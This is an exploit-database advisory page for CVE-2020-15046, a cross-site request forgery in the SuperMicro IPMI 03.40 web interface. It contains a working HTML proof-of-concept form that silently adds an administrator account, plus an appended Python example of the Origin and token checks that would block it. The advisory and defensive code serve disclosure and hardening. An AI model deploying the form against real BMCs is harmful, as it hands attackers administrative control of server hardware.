SuperMicro IPMI 03.40 Cross Site Request Forgery

2020.07.12
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

# Exploit Title: SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.supermicro.com/
# Software Link: https://www.supermicro.com/en/solutions/management-software/bmc-resources
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# CVE: CVE-2020-15046
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
# Description:
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and
# IPMI firmware 03.40 allows remote attackers to exploit a cgi/config_user.cgi
# CSRF issue to add new admin users.
# The fixed versions are BIOS 3.2 and firmware 03.88.
# PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
      <input type="hidden" name="username" value="JOKER" />
      <input type="hidden" name="original&#95;username" value="2" />
      <input type="hidden" name="password" value="onebadday" />
      <input type="hidden" name="new&#95;privilege" value="4" />
      <input type="submit" value="submit request" />
    </form>
  </body>
</html>
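As an added defender-side example (not Supermicro's firmware code), this shows the two checks a hardened config_user.cgi handler would apply, run against a request shaped like the PoC above: the Origin/Referer must name the BMC itself, and the form must carry a per-session token. BMC_HOST, the csrf_token field name and attacker.example are assumptions.

```python
import secrets
from urllib.parse import urlsplit

BMC_HOST = "supermicro-ip"  # assumed host name of the BMC's web interface

def source_host(headers):
    """Host named by Origin (preferred) or Referer; None if neither is sent."""
    for name in ("Origin", "Referer"):
        if headers.get(name):
            return (urlsplit(headers[name]).hostname or "").lower()
    return None

def check_state_change(method, headers, form, session_token):
    """Return 'allow' or a rejection reason for a state-changing request.
    A session cookie alone is not proof of user intent (the root of CWE-352),
    so the request source and a form-carried token are verified independently."""
    if method.upper() != "POST":
        return "reject: state change must be POST"
    src = source_host(headers)
    if src is None:
        return "reject: no Origin/Referer"
    if src != BMC_HOST:
        return f"reject: cross-site source {src}"
    token = form.get("csrf_token", "")
    if not secrets.compare_digest(token.encode(), session_token.encode()):
        return "reject: missing or wrong csrf_token"
    return "allow"

# Constructed input with the field set from the advisory's PoC form.
POC_FORM = {"username": "JOKER", "original_username": "2",
            "password": "onebadday", "new_privilege": "4"}

def poc_verdict(session_token):
    """The PoC as the BMC would see it: the victim's browser posts the hidden
    form from the attacker's page, so Origin names that page and no token is
    present (the BMC session cookie is attached by the browser automatically)."""
    return check_state_change("POST", {"Origin": "https://attacker.example"},
                              POC_FORM, session_token)

def legitimate_verdict(session_token):
    """Same form submitted from the BMC's own page with the session token."""
    form = dict(POC_FORM, csrf_token=session_token)
    return check_state_change("POST", {"Origin": f"https://{BMC_HOST}"},
                              form, session_token)

if __name__ == "__main__":
    token = secrets.token_urlsafe(32)   # would be issued once per login session
    print(poc_verdict(token))           # reject: cross-site source attacker.example
    print(legitimate_verdict(token))    # allow
```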


Copyright 2024, cxsecurity.com